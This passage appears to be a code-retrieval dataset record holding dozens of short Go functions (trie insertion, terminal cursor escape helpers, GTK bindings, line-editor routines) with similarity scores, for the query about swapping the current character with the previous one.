int64(TextBufInsert), tbe)\n\t}\n\tif tb.Autosave {\n\t\tgo tb.AutoSave()\n\t}\n\treturn tbe\n}", "func (ed *Editor) InsertText(text string) {\n\tif ed.getTextarea() == nil {\n\t\tconsole.Log(\"editor.InsertText(): getTextarea() is nil!\")\n\t\treturn\n\t}\n\ted.ta.InsertText(text)\n\ted.onChange(nil)\n}", "func (w *VT100Writer) CursorForward(n int) {\n\tif n < 0 {\n\t\tw.CursorBack(-n)\n\t} else if n > 0 {\n\t\ts := strconv.Itoa(n)\n\t\tw.WriteRaw([]byte{0x1b, '['})\n\t\tw.WriteRaw([]byte(s))\n\t\tw.WriteRaw([]byte{'C'})\n\t}\n}", "func (v *TreeStore) Insert(parent *TreeIter, position int) *TreeIter {\n\tvar ti C.GtkTreeIter\n\tvar cParent *C.GtkTreeIter\n\tif parent != nil {\n\t\tcParent = parent.native()\n\t}\n\tC.gtk_tree_store_insert(v.native(), &ti, cParent, C.gint(position))\n\titer := &TreeIter{ti}\n\treturn iter\n}", "func (this *Trie) Insert(word string) {\n\tnode := this\n\n\tfor _, char := range word {\n\t\tchar -= 'a'\n\t\tif node.children[char] == nil {\n\t\t\tnode.children[char] = &Trie{}\n\t\t}\n\t\tnode = node.children[char]\n\t}\n\n\tnode.isEnd = true\n}", "func (this *Trie) Insert(word string) {\n\tn := this.root\n\n\tfor i := 0; i < len(word); i++ {\n\t\twid := word[i] - 'a'\n\t\tif n.children[wid] == nil {\n\t\t\tn.children[wid] = &node{\n\t\t\t\tch: word[i : i+1],\n\t\t\t\tchildren: [26]*node{},\n\t\t\t\tisWordOfEnd: false,\n\t\t\t}\n\t\t}\n\t\tn = n.children[wid]\n\t}\n\tn.isWordOfEnd = true\n}", "func WriteChar(buffer []byte, offset int, value rune) {\n WriteUInt8(buffer, offset, uint8(value))\n}", "func (this *Trie) Insert(word string) {\n\ttrie := this\n\tfor _, char := range word {\n\t\tisLeaf := false\n\t\tif trie.childs[char-97] == nil {\n\t\t\ttrie.childs[char-97] = &Trie{isLeaf: isLeaf}\n\t\t}\n\t\ttrie = trie.childs[char-97]\n\t}\n\ttrie.isLeaf = true\n}", "func (sl *stringList) insert(i int, aString string) {\n\t// Add a empty string value to the end of the slice, to make room for the new element.\n\tsl.elements = append(sl.elements, \"\")\n\t// Copy values from the insertion point to the right by one\n\tcopy(sl.elements[i+1:], sl.elements[i:])\n\t// Set the value at the insertion point\n\tsl.elements[i] = aString\n}", "func MoveCursor(row int, column int) {\n\tfmt.Printf(CSI+CursorPositionSeq, row, column)\n}", "func SetContent(x, y int, mainc rune, combc []rune, style tcell.Style) {\n\tif !Screen.CanDisplay(mainc, true) {\n\t\tmainc = '�'\n\t}\n\n\tScreen.SetContent(x, y, mainc, combc, style)\n\tif UseFake() && lastCursor.x == x && lastCursor.y == y {\n\t\tlastCursor.r = mainc\n\t\tlastCursor.style = style\n\t\tlastCursor.combc = combc\n\t}\n}", "func (t *Trie) Insert(w string) {\n\tcur := t.root\n\tfor _, c := range []byte(w) {\n\t\ti := c - 'a'\n\t\tif cur.children[i] == nil {\n\t\t\tcur.children[i] = &node{}\n\t\t}\n\t\tcur = cur.children[i]\n\t}\n\tcur.count++\n}", "func (this *Trie) Insert(word string) {\n\tfor i := 0; i < len(word); i++ {\n\t\tif this.son[word[i]-'a'] == nil {\n\t\t\tthis.son[word[i]-'a'] = &Trie{word[i] - 'a', false, [26]*Trie{}}\n\t\t}\n\t\tthis = this.son[word[i]-'a']\n\t}\n\tthis.isWord = true\n}", "func (t *Trie) Insert(word string) {\n\tchars := t.toChars(word)\n\tr := t.root\n\tfor i := 0; i < len(chars); i++ {\n\t\tif _, ok := r.children[chars[i]]; !ok {\n\t\t\tr.children[chars[i]] = &node{\n\t\t\t\tend: false,\n\t\t\t\tchildren: make(map[string]*node),\n\t\t\t}\n\t\t}\n\t\tif i == len(chars)-1 {\n\t\t\tr.children[chars[i]].end = true\n\t\t}\n\t\tr = r.children[chars[i]]\n\t}\n}", "func setCursorRow(row int) error {\n\t// todo: is this \"really\" needed?\n\t// if isatty.IsTerminal(os.Stdin.Fd()) {\n\t// \toldState, err := terminal.MakeRaw(0)\n\t// \tif err != nil {\n\t// \t\tpanic(err)\n\t// \t}\n\t// \tdefer terminal.Restore(0, oldState)\n\t// }\n\n\t// sets the cursor position where subsequent text will begin: <ESC>[{ROW};{COLUMN}H\n\t// great resource: http://www.termsys.demon.co.uk/vtansi.htm\n\t_, err := fmt.Fprintf(getScreen().output, \"\\x1b[%d;0H\", row)\n\treturn err\n}", "func SetCursor(pos int) []byte {\n\tp := []byte(fmt.Sprintf(\"%d\", pos))\n\treturn concat(dup(ansi[Cr].Chars), open, p, dir[Rgt])\n}", "func (this *Trie) Insert(word string) {\n\n}", "func (w *Window) Insert(e interface{}) {\n\tw.insertAt(time.Now(), e)\n}", "func (ed *Editor) putString(s string) {\n\ted.buffer.ClearSel(ed.dot)\n\taddr := ed.buffer.InsertString(ed.dot.From, s)\n\ted.dot.To = addr\n}", "func (this *Trie) Insert(word string) {\n\tif len(word) == 0 {\n\t\tthis.end = true\n\t\treturn\n\t}\n\tfor _, e := range this.edges {\n\t\tif e.char == word[0] {\n\t\t\te.next.Insert(word[1:])\n\t\t\treturn\n\t\t}\n\t}\n\te := &edge{\n\t\tchar: word[0],\n\t\tnext: new(Trie),\n\t}\n\tthis.edges = append(this.edges, e)\n\te.next.Insert(word[1:])\n}", "func (this *Trie) Insert(word string) {\n\tif word == \"\" {\n\t\treturn\n\t}\n\tindex := ([]byte(word[0:1]))[0] - byte('a')\n\tif this.child[index] == nil {\n\t\tthis.child[index] = &Trie{\n\t\t\twd: false,\n\t\t}\n\t}\n\n\tif word[1:] == \"\" {\n\t\tthis.child[index].wd = true\n\t\treturn\n\t} else {\n\t\tthis.child[index].Insert(word[1:])\n\t}\n\n}", "func insertOrdered(b Decomposition, r rune) Decomposition {\n\tn := len(b)\n\tb = append(b, 0)\n\tcc := ccc(r)\n\tif cc > 0 {\n\t\t// Use bubble sort.\n\t\tfor ; n > 0; n-- {\n\t\t\tif ccc(b[n-1]) <= cc {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tb[n] = b[n-1]\n\t\t}\n\t}\n\tb[n] = r\n\treturn b\n}", "func (this *Trie) Insert(word string) {\n\tcurr := this\n\tfor _, c := range word {\n\t\tif curr.next[c-'a'] == nil {\n\t\t\tcurr.next[c-'a'] = &Trie{}\n\t\t}\n\t\tcurr = curr.next[c-'a']\n\t}\n\tcurr.isWord = true\n}", "func (t *Trie) Insert(w string) {\r\n\twordLength := len(w)\r\n\tcurrentNode := t.root\r\n\tfor i := 0; i < wordLength; i++ {\r\n\t\tcharIndex := w[i] - 'a'\r\n\t\tif currentNode.children[charIndex] == nil {\r\n\t\t\tcurrentNode.children[charIndex] = &Node{}\r\n\t\t}\r\n\t\tcurrentNode = currentNode.children[charIndex]\r\n\t}\r\n\tcurrentNode.isEnd = true\r\n}", "func (this *Trie) Insert(s string) {\n\tvar t *TrieNode = this.root\n\tfor _, a := range s {\n\t\tt = t.AddChild(a)\n\t}\n\tt.SetEnd(true)\n}", "func (s *BaseCGListener) EnterAnynonescapedchar(ctx *AnynonescapedcharContext) {}", "func (this *Trie) Insert(word string) {\n\tcur := this.root\n\n\t// go through word\n\tfor _, c := range word {\n\t\t// check if not already in children\n\t\tif _, ok := cur.children[c]; !ok {\n\t\t\t// create\n\t\t\tcur.children[c] = &TrieNode{map[rune]*TrieNode{}, false}\n\t\t}\n\t\t// set next\n\t\tcur = cur.children[c]\n\t}\n\n\t// mark as end of word\n\tcur.isEnd = true\n}", "func (t *Trie) Insert(word string) {\n\tcurr := t.Root\n\tfor _, char := range word {\n\t\tif _, ok := curr.Children[char]; !ok {\n\t\t\tcurr.Children[char] = &TrieNode{}\n\t\t}\n\t\tcurr = curr.Children[char]\n\t}\n\tcurr.IsLeaf = true\n}", "func (obj *Value) SetChar(v byte) {\n\tobj.Candy().Guify(\"g_value_set_char\", obj, int(v))\n}", "func (t *Trie) Insert(word string) {\n\tcur := t.Root\n\tfor _, c := range word {\n\t\tfmt.Print(c)\n\t\t_, ok := cur.Next[c]\n\t\tif !ok {\n\t\t\tcur.Next[c] = &Node{\n\t\t\t\tNext: make(map[rune] *Node),\n\t\t\t}\n\t\t}\n\n\t\tcur = cur.Next[c]\n\t}\n\n\tif !cur.IsWord {\n\t\tcur.IsWord = true\n\t}\n\n}", "func (b *Board) put(x, y int, u string) {\n\tif u == \"o\" {\n\t\tb.tokens[x+3*y] = 1\n\t} else if u == \"x\" {\n\t\tb.tokens[x+3*y] = -1\n\t}\n}", "func (t *Trie) Insert(word string) {\n\twordLength := len(word)\n\tcurrent := t.root\n\tfor i := 0; i < wordLength; i++ {\n\t\tindex := word[i] - 'a'\n\t\tif current.children[index] == nil {\n\t\t\tcurrent.children[index] = &TrieNode{}\n\t\t}\n\t\tcurrent = current.children[index]\n\t}\n\tcurrent.isWordEnd = true\n}", "func (s *BaseMySqlParserListener) EnterCharFunctionCall(ctx *CharFunctionCallContext) {}", "func (sm safeMap) Insert(key string, value interface{}) {\n\tsm <- commandData{action: INSERT, key: key, value: value}\n}", "func (fdb *fdbSlice) Insert(k Key, v Value) error {\n\n\tfdb.cmdCh <- kv{k: k, v: v}\n\treturn fdb.fatalDbErr\n\n}", "func (c *CmdBuff) Add(r rune) {\n\tc.mx.Lock()\n\t{\n\t\tc.buff = append(c.buff, r)\n\t}\n\tc.mx.Unlock()\n\tc.fireBufferChanged(c.GetText(), c.GetSuggestion())\n\tif c.hasCancel() {\n\t\treturn\n\t}\n\tctx, cancel := context.WithTimeout(context.Background(), keyEntryDelay)\n\tc.setCancel(cancel)\n\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tc.fireBufferCompleted(c.GetText(), c.GetSuggestion())\n\t\tc.resetCancel()\n\t}()\n}", "func insert(n, p *node, s string, t *T, v interface{}) *node {\n\tif len(s) == 0 {\n\t\tif n != nil && n.parent != nil && !n.parent.end {\n\t\t\tn.parent.end = true\n\t\t\tn.parent.value = v\n\t\t\tt.words++\n\t\t}\n\n\t\treturn n\n\t}\n\n\tc := rune(s[0])\n\tif n == nil {\n\t\tn = &node{char: c, parent: p}\n\t\tif len(s) == 1 {\n\t\t\tn.end = true\n\t\t\tn.value = v\n\t\t\tt.words++\n\t\t}\n\t}\n\n\tif c < n.char {\n\t\tn.lo = insert(n.lo, n, s, t, v)\n\t} else if c > n.char {\n\t\tn.hi = insert(n.hi, n, s, t, v)\n\t} else {\n\t\tn.eq = insert(n.eq, n, s[1:len(s)], t, v)\n\t}\n\n\treturn n\n}", "func (t *Text) Insert(world *ecs.World) {\n\tt.Render()\n\n\tfor _, system := range world.Systems() {\n\t\tswitch sys := system.(type) {\n\t\tcase *common.RenderSystem:\n\t\t\tsys.Add(\n\t\t\t\t&t.BasicEntity,\n\t\t\t\t&t.RenderComponent,\n\t\t\t\t&t.SpaceComponent,\n\t\t\t)\n\t\tcase *common.MouseSystem:\n\t\t\tsys.Add(\n\t\t\t\t&t.BasicEntity,\n\t\t\t\t&t.MouseComponent,\n\t\t\t\t&t.SpaceComponent,\n\t\t\t\t&t.RenderComponent,\n\t\t\t)\n\t\tcase *TextUpdateSystem:\n\t\t\tsys.Add(t)\n\t\tcase *ButtonControlSystem:\n\t\t\tsys.Add(\n\t\t\t\t&t.BasicEntity,\n\t\t\t\t&t.MouseComponent,\n\t\t\t\t&t.ButtonControlComponent,\n\t\t\t)\n\t\t}\n\t}\n}", "func (recv *Value) SetChar(vChar rune) {\n\tc_v_char := (C.gchar)(vChar)\n\n\tC.g_value_set_char((*C.GValue)(recv.native), c_v_char)\n\n\treturn\n}", "func (t *T) Insert(s string, v interface{}) {\n\tt.root = insert(t.root, nil, s, t, v)\n}", "func (s *Action) Insert(c *cli.Context) error {\n\tctx := ctxutil.WithGlobalFlags(c)\n\techo := c.Bool(\"echo\")\n\tmultiline := c.Bool(\"multiline\")\n\tforce := c.Bool(\"force\")\n\tappending := c.Bool(\"append\")\n\n\targs, kvps := parseArgs(c)\n\tname := args.Get(0)\n\tkey := args.Get(1)\n\n\tif name == \"\" {\n\t\treturn exit.Error(exit.NoName, nil, \"Usage: %s insert name\", s.Name)\n\t}\n\n\treturn s.insert(ctx, c, name, key, echo, multiline, force, appending, kvps)\n}", "func CursorUp(r uint) {\n\temitEscape(\"A\", r)\n}", "func insertIntoPosition(data []string, insertion string) []string {\n\t// I am really sorry for this loop. I have not figured out why slice concatenation doesn't work\n\tvar newData []string\n\tdataLength := len(data)\n\tposition := pickNumberRange(dataLength + 1)\n\tif position == dataLength {\n\t\tnewData = append(data, []string{insertion}...)\n\t} else {\n\t\tfor i, entry := range data {\n\t\t\tif i == position {\n\t\t\t\tnewData = append(newData, []string{insertion}...)\n\t\t\t}\n\t\t\tnewData = append(newData, entry)\n\t\t}\n\t}\n\treturn newData\n}", "func (d *Display) WriteChar(code uint8) *Display {\n\td.sendData(code)\n\treturn d\n}", "func (s *BasePCREListener) EnterOctal_char(ctx *Octal_charContext) {}", "func (this *Trie) Insert(word string) {\n\tnode := this\n\tfor _, v := range word {\n\t\tv = v - 'a'\n\t\tif node.next[v] == nil {\n\t\t\tnode.next[v] = &Trie{}\n\t\t}\n\t\tnode = node.next[v]\n\t}\n\tnode.isEnd = true\n}", "func MoveCursor(pos int, d int) []byte {\n\tp := []byte(fmt.Sprintf(\"%d\", pos))\n\treturn concat(open, p, dir[d])\n}", "func (this *Trie) Insert(word string) {\n\tcur := this.Root\n\tfor _, c := range word {\n\t\tif _, ok := cur.Child[c]; !ok {\n\t\t\tcur.Child[c] = &Node{\n\t\t\t\tChild: map[rune]*Node{},\n\t\t\t}\n\t\t}\n\t\tcur = cur.Child[c]\n\t}\n\tcur.Value = true\n}", "func TextInsertLines(n int) string {\n\treturn Esc + strconv.Itoa(n) + \"L\"\n}", "func (o *Octree) Insert(p *Point) {\n\tif o.root == nil {\n\t\to.root = newLeaf(p)\n\t\treturn\n\t}\n\n\to.root = o.root.Insert(p)\n}", "func (c Cursor) Sprint() string {\n\treturn fmt.Sprintf(\"%s%c\", EscapeStart, c)\n}", "func (fb *FlowBox) Insert(widget IWidget, position int) {\n\tC.gtk_flow_box_insert(fb.native(), widget.toWidget(), C.gint(position))\n}", "func (t *Trie) Insert(w string) {\n\twordLength := len(w)\n\tcurrentNode := t.root\n\tfor i := 0; i < wordLength; i++ {\n\t\tcharIndex := w[i] - 'a'\n\t\tcurrentNode.weight[charIndex]++\n\t\tif currentNode.children[charIndex] == nil {\n\t\t\tcurrentNode.children[charIndex] = &Node{}\n\t\t}\n\t\tcurrentNode = currentNode.children[charIndex]\n\t}\n\tcurrentNode.isEnd = true\n}", "func (w *VT100Writer) CursorUp(n int) {\n\tif n < 0 {\n\t\tw.CursorDown(-n)\n\t} else if n > 0 {\n\t\ts := strconv.Itoa(n)\n\t\tw.WriteRaw([]byte{0x1b, '['})\n\t\tw.WriteRaw([]byte(s))\n\t\tw.WriteRaw([]byte{'A'})\n\t}\n}" ]
[ "0.76106894", "0.7585166", "0.7517167", "0.7278935", "0.7108609", "0.70963687", "0.6521914", "0.64360595", "0.63691735", "0.6232524", "0.62302566", "0.6224099", "0.6085163", "0.6070685", "0.6023234", "0.5956973", "0.5898353", "0.5883555", "0.5878901", "0.58115983", "0.57928866", "0.5773867", "0.5772237", "0.57603973", "0.57391745", "0.5719677", "0.5646414", "0.5640315", "0.5627453", "0.5615292", "0.5614798", "0.5605658", "0.5578966", "0.5564931", "0.552516", "0.55245394", "0.550533", "0.5497369", "0.54902357", "0.54292274", "0.54289573", "0.542323", "0.5399823", "0.53995746", "0.5384216", "0.5383902", "0.5382171", "0.5372396", "0.5348627", "0.53466296", "0.5331938", "0.52852744", "0.5282169", "0.52750325", "0.527377", "0.5268332", "0.52629393", "0.5257124", "0.5252994", "0.52396446", "0.5234016", "0.5222868", "0.5206889", "0.5205421", "0.5201282", "0.51972467", "0.519641", "0.5177856", "0.51622576", "0.5159924", "0.51522106", "0.5128648", "0.51239574", "0.5119239", "0.5112378", "0.50974727", "0.5088889", "0.50756824", "0.505529", "0.50543547", "0.50442976", "0.50412905", "0.5022503", "0.5006984", "0.50000775", "0.4994849", "0.49879152", "0.4974381", "0.4965006", "0.49647117", "0.4958396", "0.49499318", "0.49445736", "0.4938545", "0.49351397", "0.49313787", "0.49304548", "0.4924365", "0.49225423", "0.49175924" ]
0.729633
3
Swap current character with the previous character.
func (ls *linestate) editSwap() { if ls.pos > 0 && ls.pos < len(ls.buf) { tmp := ls.buf[ls.pos-1] ls.buf[ls.pos-1] = ls.buf[ls.pos] ls.buf[ls.pos] = tmp if ls.pos != len(ls.buf)-1 { ls.pos++ } ls.refreshLine() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (c *Cursor) Previous() {\n\tc.pos--\n}", "func swap(a, b rune, plugboard string) string {\n\tfor i, letter := range plugboard {\n\t\tif letter == a {\n\t\t\tplugboard = plugboard[0:i] + string(b) + plugboard[i+1:]\n\t\t} else if letter == b {\n\t\t\tplugboard = plugboard[0:i] + string(a) + plugboard[i+1:]\n\t\t}\n\t}\n\n\treturn plugboard\n}", "func Swap(embed *discordgo.MessageEmbed) *discordgo.MessageEmbed {\n\tembed.Author.Name = \"Command: swap\"\n\tembed.Description = \"`swap <text>` will swap letters in the text given.\"\n\tembed.Fields = []*discordgo.MessageEmbedField{\n\t\t{\n\t\t\tName: \"<text>\",\n\t\t\tValue: \"The text to swap letters in\",\n\t\t\tInline: true,\n\t\t},\n\t\t{\n\t\t\tName: \"Related commands:\",\n\t\t\tValue: \"`caps`, `lower`, `randomcaps`, `title`\",\n\t\t},\n\t}\n\treturn embed\n}", "func (c *Clac) Swap() error {\n\treturn c.rotate(1, 1, true)\n}", "func (p Pair) Swap() Pair {\n\tp.Base, p.Quote = p.Quote, p.Base\n\treturn p\n}", "func (c *CompletionManager) Previous() {\n\tif c.verticalScroll == c.selected && c.selected > 0 {\n\t\tc.verticalScroll--\n\t}\n\tc.selected--\n\tc.update()\n}", "func (s *Scanner) prev() {\n\ts.end -= s.width\n}", "func (h *History) Previous() {\n\tload := h.Load()\n\n\tif len(load) <= 1 {\n\t\tfmt.Println(\"history empty\")\n\t\tos.Exit(0)\n\t}\n\n\titem := make([]string, 1)\n\tcopy(item, load[len(load)-2:len(load)-1])\n\n\tprompt := promptui.Select{\n\t\tLabel: \"Prvious\",\n\t\tItems: item,\n\t}\n\n\t_, result, err := prompt.Run()\n\n\tif err != nil {\n\t\tlog.Fatalln(\"Prompt failed: \\n\", err)\n\t}\n\th.Write(result)\n\tExecuteItem(h.binary, result)\n}", "func (i *Input) Backspace() {\n\tif i.Pos > 0 {\n\t\ti.Buffer.RemoveRune(i.Pos - 1)\n\t\ti.Pos--\n\t}\n}", "func swapR(s string, x, y rune) string {\n\n\txi := strings.IndexRune(s, x)\n\tyi := strings.IndexRune(s, y)\n\n\t//if the above searches return nothing, value will be -1 and will cause panic\n\treturn swapI(s, xi, yi)\n\n}", "func (l *StringLexer) PrevByte() byte {\n\treturn l.input[l.pos-1]\n}", "func (cc *charCounts) Swap(i, j int) {\n\tcc.counts[i], cc.counts[j] = cc.counts[j], cc.counts[i]\n}", "func reverseComplement(sequence string) (out string) {\n for i := len(sequence)-1; i >= 0; i-- {\n\n switch sequence[i] {\n\n case 65:\n out += \"T\"\n break\n case 84:\n out += \"A\"\n break\n case 71:\n out += \"C\"\n break\n case 67:\n out += \"G\"\n break\n default:\n fmt.Println(\"Error -- Encountered non-ATGC char in sequence\")\n }\n\n }\n return\n}", "func (ls *linestate) editBackspace() {\n\tif ls.pos > 0 && len(ls.buf) > 0 {\n\t\tls.buf = append(ls.buf[:ls.pos-1], ls.buf[ls.pos:]...)\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func (l *Lexer) current() rune {\n\tif l.pos < l.width {\n\t\treturn ' '\n\t}\n\tr, _ := utf8.DecodeRuneInString(l.input[l.pos-l.width:])\n\treturn r\n}", "func (p Pair) Swap() Pair {\n\treturn Pair{Base: p.Quote, Quote: p.Base}\n}", "func swap(a *models.CabInfo, b *models.CabInfo) {\n\ttemp := *a\n\t*a = *b\n\t*b = temp\n}", "func (l *LexInner) Back() {\n\tif l.Last() == '\\n' {\n\t\tl.mark.line--\n\t}\n\tl.mark.pos -= l.mark.width\n\tl.mark.width = 0\n}", "func (m *Maps) Swap(c types.Coordinate, o io.Runeable) io.Runeable {\n\tdisplaced := m.CurrentMap()[c.Y][c.X]\n\tm.CurrentMap()[c.Y][c.X] = o\n\n\treturn displaced\n}", "func swapI(s string, x, y int) string {\n\n\tr := []rune(s)\n\tr[x], r[y] = r[y], r[x]\n\n\treturn string(r)\n\n}", "func (cycle *Cycle) Prev() {\n\tif !cycle.showing {\n\t\treturn\n\t}\n\n\tif cycle.selected == -1 {\n\t\tcycle.selected = len(cycle.items) - 1\n\t} else {\n\t\tcycle.selected--\n\t}\n\n\tcycle.selected = misc.Mod(cycle.selected, len(cycle.items))\n\tcycle.highlight()\n}", "func (i *Input) backspace() {\n\tcurLine := i.lines[i.cursorLineIndex]\n\t// at the beginning of the buffer, nothing to do\n\tif len(curLine) == 0 && i.cursorLineIndex == 0 {\n\t\treturn\n\t}\n\n\t// at the beginning of a line somewhere in the buffer\n\tif i.cursorLinePos == 0 {\n\t\tprevLine := i.lines[i.cursorLineIndex-1]\n\t\t// remove the newline character from the prevline\n\t\tprevLine = prevLine[:len(curLine)-1] + curLine\n\t\ti.lines = append(i.lines[:i.cursorLineIndex], i.lines[i.cursorLineIndex+1:]...)\n\t\ti.cursorLineIndex--\n\t\ti.cursorLinePos = len(prevLine) - 1\n\t\treturn\n\t}\n\n\t// I'm at the end of a line\n\tif i.cursorLinePos == len(curLine)-1 {\n\t\ti.lines[i.cursorLineIndex] = curLine[:len(curLine)-1]\n\t\ti.cursorLinePos--\n\t\treturn\n\t}\n\n\t// I'm in the middle of a line\n\ti.lines[i.cursorLineIndex] = curLine[:i.cursorLinePos-1] + curLine[i.cursorLinePos:]\n\ti.cursorLinePos--\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n\tl.runeCnt--\n}", "func (p PlayerIndex) Previous(state State) PlayerIndex {\n\tif p == AdminPlayerIndex || p == ObserverPlayerIndex {\n\t\treturn p\n\t}\n\tp--\n\tif int(p) < 0 {\n\t\tp = PlayerIndex(len(state.PlayerStates()) - 1)\n\t}\n\treturn p\n}", "func (l *Lexer) readChar() {\n\tl.prevCh = l.ch\n\tif l.readPos >= runeLen(l.input) {\n\t\tl.ch = 0\n\t} else {\n\t\tl.ch = toRunes(l.input)[l.readPos]\n\t}\n\tl.pos = l.readPos\n\tl.readPos += runeLen(string(l.ch))\n}", "func getPrevCommand(g *gocui.Gui, v *gocui.View) error {\n\ts := v.Buffer()\n\ts = screen.sb.GetPrevCommand(s)\n\tif len(s) == 0 {\n\t\tresetCursor(v)\n\t}\n\n\tv.Clear()\n\tv.Write([]byte(s))\n\n\treturn nil\n}", "func swap(x, y string) (string, string) {\n\treturn y, x\n}", "func swap(x, y string) (string, string) {\n\treturn y, x\n}", "func swap(x, y string) (string, string) {\n\treturn y, x\n}", "func swap(x, y string) (string, string) {\n\treturn y, x\n}", "func swap(x, y string) (string, string) {\n\treturn y, x\n}", "func swap(x, y string) (string, string) {\n\treturn y, x\n}", "func swap(x, y string) (string, string) {\n\treturn y, x\n}", "func (i *Interpreter) Advance() {\n\ti.position++\n\tif i.position > len(i.text)-1 {\n\t\ti.currentChar = \"\"\n\t} else {\n\t\ti.currentChar = string(i.text[i.position])\n\t}\n}", "func (ps *Parser) currentChar() string {\n\treturn string(ps.Runes[ps.Offset])\n}", "func CurUp(y int) string { return fmt.Sprintf(\"\\x1b[%dA\", y) }", "func (s *State) FocusPrevious() {\n\ts.focused = s.lastFocusable\n\ts.update = true\n}", "func (o *ArtifactListerPartialContent) SetPrevious(previous string) {\n\to.Previous = previous\n}", "func (s *Scanner) currentChar() byte {\n\tif char, err := s.Reader.ReadByte(); err == nil {\n\t\ts.Reader.UnreadByte()\n\t\treturn char\n\t} else {\n\t\treturn 0\n\t}\n}", "func (l *Lexer) Current() rune {\n\tif l.b {\n\t\treturn l.p\n\t}\n\treturn l.r\n}", "func reverse(s string) string {\r\n rns := []rune(s) // convert to rune\r\n for i, j := 0, len(rns)-1; i < j; i, j = i+1, j-1 {\r\n \r\n // swap the letters of the string,\r\n // like first with last and so on.\r\n rns[i], rns[j] = rns[j], rns[i]\r\n }\r\n \r\n // return the reversed string.\r\n return string(rns)\r\n}", "func swap(x string, y string) (string, string) {\n\treturn y, x\n}", "func (p *StringPair) Exchange() {\n\tp.first, p.second = p.second, p.first\n}", "func (c *Counter) UpdatePrev() {\n\tc.prev = c.cur\n\tc.prevBytes = c.curBytes\n\tc.prevActiveSecs = c.curActiveSecs\n\tc.t = time.Now()\n}", "func (l *Linenoise) historyPrev(ls *linestate) string {\n\tif len(l.history) == 0 {\n\t\treturn \"\"\n\t}\n\t// update the current history entry with the line buffer\n\tl.historySet(ls.historyIndex, ls.String())\n\tls.historyIndex++\n\t// previous history item\n\tif ls.historyIndex >= len(l.history) {\n\t\tls.historyIndex = len(l.history) - 1\n\t}\n\treturn l.historyGet(ls.historyIndex)\n}", "func (lx *lexer) backup() {\r\n\tlx.pos -= lx.width\r\n\tif lx.pos < len(lx.input) && lx.input[lx.pos] == '\\n' {\r\n\t\tlx.line--\r\n\t}\r\n}", "func (b *Buffer) PutChar(c byte) error {\n\tb.Cursor.Char = c\n\to := b.Cursor.Offset(b.Width)\n\tt := b.Expand(o).Tile(o)\n\tt.Update(&b.Cursor.Tile)\n\tb.Cursor.X++\n\tb.Cursor.NormalizeAndWrap(b.Width)\n\tb.maxWidth = calc.MaxInt(b.maxWidth, b.Cursor.X)\n\tb.maxHeight = calc.MaxInt(b.maxHeight, b.Cursor.Y)\n\treturn nil\n}", "func (l *lexer) backup() {\n\tl.position = l.position - 1\n}", "func (l *lexer) backup() {\n\tl.position = l.position - 1\n}", "func (s CrossTransactions) Swap(i, j int) { s[i], s[j] = s[j], s[i] }", "func (o *MovableObject) Prev() {\n\to.point.X -= o.Arrow.X\n\to.point.Y -= o.Arrow.Y\n}", "func (l *lexer) backup() {\n\tif l.width == -1 {\n\t\tpanic(\"double backup\")\n\t}\n\tl.pos -= l.width\n\tl.width = -1\n}", "func (p *Player) Previous() { p.Player.Call(INTERFACE+\".Player.Previous\", 0) }", "func (r *rankImpl) Prev(curr string) (string, error) {\n\tif !r.isValidRank(curr) {\n\t\treturn \"\", InvalidRankError\n\t}\n\tif r.Greater(curr, RANK_MAX) {\n\t\treturn \"\", OverflowError\n\t}\n\tif r.Less(curr, RANK_MIN) || curr == \"\" {\n\t\treturn \"\", UnderflowError\n\t}\n\tcurr = strings.TrimRight(curr, RANK_MIN)\n\tif len(curr) < r.Limit {\n\t\tnewIdx := strings.Index(DIGITS, string(curr[len(curr)-1])) - 1\n\t\tret := curr[:len(curr)-1] + string(DIGITS[newIdx])\n\t\tfor i := 0; i < r.Limit-len(curr); i++ {\n\t\t\tret += RANK_MAX\n\t\t}\n\t\treturn strings.TrimRight(ret, RANK_MIN), nil\n\t}\n\tlastNewIdx := strings.Index(DIGITS, string(curr[len(curr)-1])) - 1\n\tret := strings.TrimRight(curr[:len(curr)-1]+string(DIGITS[lastNewIdx]), RANK_MIN)\n\treturn ret, nil\n}", "func (lexto *LongLexto) Previous() Token {\n\tif lexto.HasPrevious() {\n\t\tresult := lexto.tokens[lexto.current]\n\t\tlexto.current -= 1\n\t\treturn result\n\t}\n\treturn Token{}\n}", "func (o *ArtifactListerOK) SetPrevious(previous string) {\n\to.Previous = previous\n}", "func (mc *Chain) SetPreviousBlock(r round.RoundI, b *block.Block, pb *block.Block) {\n\tb.SetPreviousBlock(pb)\n\tmc.SetRoundRank(r, b)\n\tb.ComputeChainWeight()\n}", "func ByteSwappedUnicode(swap bool) {\n\tval := 0\n\tif swap {\n\t\tval = 1\n\t}\n\tC.TTF_ByteSwappedUNICODE(C.int(val))\n}", "func toState(lx *lexer, c rune, next lexerStateFn) lexerStateFn {\n\tlx.acc[0] = c\n\tlx.acc = lx.acc[:1]\n\treturn next\n}", "func swap(a, b string) (string, string) {\n\n\treturn b, a\n}", "func (b *blockEnc) swapEncoders(prev *blockEnc) {\n\tb.coders.swap(&prev.coders)\n\tb.litEnc, prev.litEnc = prev.litEnc, b.litEnc\n}", "func (player *Player) Previous() {\n\tplayer.obj.Call(\"org.mpris.MediaPlayer2.Player.Previous\", 0)\n}", "func (l *lexer) backup() {\r\n\tl.pos -= l.width\r\n\r\n\tif l.width == 1 && l.input[l.pos] == '\\n' {\r\n\t\tl.line--\r\n\t}\r\n}", "func (l *lexer) Advance() {\n\tl.pos++\n\tif l.pos > len(l.text)-1 {\n\t\tl.currentChar = \"\"\n\t} else {\n\t\tl.currentChar = l.text[l.pos]\n\t}\n}", "func CursorBackward(c uint) {\n\temitEscape(\"D\", c)\n}", "func swap(s string, pair []int) string {\n\t// Collect bytes for new string\n\ti, j := pair[0], pair[1]\n\tbytes := []byte{}\n\tfor k := range s {\n\t\tif k == i {\n\t\t\tbytes = append(bytes, s[j])\n\t\t} else if k == j {\n\t\t\tbytes = append(bytes, s[i])\n\t\t} else {\n\t\t\tbytes = append(bytes, s[k])\n\t\t}\n\t}\n\n\t// Build string\n\tbuilder := strings.Builder{}\n\tbuilder.Write(bytes)\n\treturn builder.String()\n}", "func (ts *TokenScanner) previous() Token {\n\tif ts.i <= 0 {\n\t\treturn 